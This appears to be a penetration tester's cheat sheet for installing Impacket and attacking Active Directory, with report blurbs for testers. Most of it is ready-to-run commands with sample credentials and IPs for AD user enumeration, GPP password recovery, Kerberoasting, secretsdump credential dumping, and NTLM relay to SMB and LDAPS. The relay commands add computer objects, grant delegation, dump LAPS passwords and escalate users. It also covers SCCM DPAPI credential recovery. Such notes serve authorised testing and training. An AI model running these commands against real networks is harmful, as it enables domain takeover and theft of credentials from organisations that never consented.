These tool installs are based on the existence of virtualenv.
apt update
apt install python3-virtualenvNote on virtualenv usage:
- these containers are used to allow conflicting dependency installs to live side by side harmoniously
- activate / deactivate dependency containers for proper usage
- prompt# source demo-env/bin/activate
- prompt(demo-env)# deactivate
- with screen/tmux, multiple dependency containers can be activated at the same time
Impacket
Overview: Swiss Army toolkit of Python classes for interacting with network and domain systems and services.
Tool available here
Possible Blurb: The tester next configured and launched a series of attacks against internal network and domain targets. The toolkit used to facilitate these attacks was Impacket. This collection of Python classes provides a framework for attacking various network protocols including HTTP, LDAP, and SMB.
Installation
cd /opt/
git clone https://github.com/fortra/impacket.git
cd impacket
virtualenv -p python3 imp-env
source imp-env/bin/activate
python3 -m pip install wheel
python3 -m pip install -r requirements.txt
python3 -m pip install .
deactivate
cd /opt/Usage
so many usages.
Add a computer object.
Get a list of ADUsers?
python3 GetADUsers.py -all -ts 'domain.com'/'ella_mejia':'P@55w0rd' -dc-ip 192.168.2.4 |tee -a /opt/adusers.txtGPP? Ya, you know me.
### Get-GPPPasswords!
Get-GPPPassword.py 'domain.com'/'ella_mejia':'P@55w0rd'@'192.168.2.4'Crackable kerberos tickets via GetUserSPNs?
Possible Kerberoasting Blurb: The tester next performed the Kerberoast attack with the GetUserSPNs Python toolkit, again from the Impacket suite. Kerberoasting is an attack where the attacker requests Kerberos tickets, most frequently with downgraded ciphers (RC4), for all accounts with registered service principal names (SPNs). Because this activity is normal on most AD domains, this attack often goes undetected.
GetUserSPNs.py 'domain.com'/'ella_mejia':'P@55w0rd' -dc-ip 192.168.2.4 -outputfile /opt/hashes/kerbs.txtSecrets? Give us the secrets!
### ella is an admin of 192.168.2.5
python3 secretsdump.py 'domain.com'/'ella_mejia':'P@55w0rd'@192.168.2.5 |tee -a /opt/hashes/secrets-output.txtntlmrelayx: SMB
### smb relay first
### smb relay works only against smb targets
python3 ntlmrelayx.py -tf smbtargets.file -ts -of /opt/work/relays -l /opt/work/loot -smb2support |tee -a smb-relay.logntlmrelayx: LDAP
### ldap relay, you can't relay smb to ldap, you need wpad poisoning!
### responder -w to generate ldap-relayable credential material
### /opt/work/ directory must exist
### if ldap signing is in place, try just ldap://dc01 for a target
python3 ntlmrelayx.py -6 -t ldaps://dc01 -wh bhis-wpad --add-computer bhis-itops2 --delegate-access -ts -of /opt/work/relays --dump-laps -l /opt/work/loots --escalate-user popped.user | tee -a ldaps-relay.loggetTGT.py
For when password auth acts wonky or you just need a ticket.
python3 getTGT.py 'example.com'/'user':'Password'@DC-IP-Address
Then use export inline, H/T Brad…
export KRB5CCNAME=user python3 secretsdump.py 'example.com'/'user'@host-IP-Address -k -no-pass
…or export, then run command.
export KRB5CCNAME
python3 secretsdump.py 'example.com'/'user'@host-IP-Address -k -no-pass
SCCM Investigations per Gabriel
This impacket fork was designed to directly attack SCCM clients and recover credential materials where available. You need admin privs.
wget https://codeload.github.com/clavoillotte/impacket/zip/refs/heads/pr_SystemDPAPIdump
unzip pr_SystemDPAPIdump
cd impacket-pr_SystemDPAPIdump
virtualenv -p python3 dpapi-env
source dpapi-env/bin/activate
python3 -m pip install .
cd examples
SystemDPAPIdump.py
SystemDPAPIdump.py target.domain/adminuser@targetIP